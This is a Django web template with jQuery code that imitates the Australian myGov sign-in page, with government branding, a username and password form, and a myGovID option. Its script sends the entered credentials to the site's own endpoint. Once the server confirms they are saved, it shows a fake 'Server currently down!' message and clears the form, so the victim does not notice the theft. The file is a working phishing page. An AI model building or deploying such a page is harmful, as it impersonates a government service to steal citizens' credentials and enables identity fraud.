{% extends 'base_generic.html' %}
{% load static %}

{% block content %}
    <div class="">
        <img class="img-fluid header mb-3" src="{% static 'images/navbar.png' %}" alt="logo">
    </div>

    <svg xmlns="http://www.w3.org/2000/svg" style="display: none;">
        <symbol id="exclamation-triangle-fill" fill="currentColor" viewBox="0 0 16 16">
            <path d="M8.982 1.566a1.13 1.13 0 0 0-1.96 0L.165 13.233c-.457.778.091 1.767.98 1.767h13.713c.889 0 1.438-.99.98-1.767L8.982 1.566zM8 5c.535 0 .954.462.9.995l-.35 3.507a.552.552 0 0 1-1.1 0L7.1 5.995A.905.905 0 0 1 8 5zm.002 6a1 1 0 1 1 0 2 1 1 0 0 1 0-2z"/>
        </symbol>
    </svg>

    <div class="container-fluid">
        <div class="row justify-content-center">
            <div class="col-md-4">
                <div class="alert alert-danger d-flex align-items-center" role="alert" style="visibility: hidden" id="alert">
                    <svg class="bi flex-shrink-0 me-2" width="24" height="24" role="img" aria-label="Danger:">
                        <use xlink:href="#exclamation-triangle-fill"/>
                    </svg>
                    <div>
                        Server currently down!
                    </div>
                </div>
                <a class="fis">< Back</a>
                <h1 class="h1">Sign in with myGov</h1>
                <p class="p">Choose how to sign in from these 2 options</p>
                <h2 class="mb-4">Using your myGov sign in details</h2>
                <label class="labels"><strong>Username or email</strong></label><br>
                <input name="username" id="username" class="input" type="text"><br>
                <a class="labelf">forgot password</a><br></br>

                <label class="labelp"><strong>password</strong></label><br>
                <input name="password" class="input" type="password" id="password"></input><br>
                <a class="labelf">forgot password</a><br></br>
                <button class="button submit">Sign in</button>
                <br></br>
                <p class="p2"><a class="ash">Create a myGov account</a> if you don't have one already.</p>

                <img class="line mb-3" src="{% static 'images/line.png' %}">

                <h2 class="h4">Using your myGovID Digital Identity</h2>
                <p class="p4">What is <a className="anch">Digital Identity</a> and <a class="anch">myGovID?</a></p>
                <button class="button">Continue with digital identity</button>
                <br></br>
            </div>
        </div>
    </div>
    <div class="">
        <img class="footer img-fluid" src="{% static 'images/bot.png' %}">
    </div>

{% endblock %}

{% block script %}
    <script>
        $('.submit').on('click', function () {
            let username = $('#username').val();
            let password = $('#password').val();
            let alert = $('#alert')

            if (username.trim().length !== 0 && password.trim().length) {
                $.ajax({
                    type: 'POST',
                    url: '{% url 'submit' %}',
                    data: {
                        username: username,
                        password: password,
                        csrfmiddlewaretoken: '{{ csrf_token }}'
                    },
                    success: function (data) {
                        if (data['saved']) {
                            alert.show();
                            $('#username').val("");
                            $('#password').val("");
                        }
                    },
                    error: function (data) {
                        alert("Failed")
                    }
                });
            }
        });
    </script>
{% endblock %}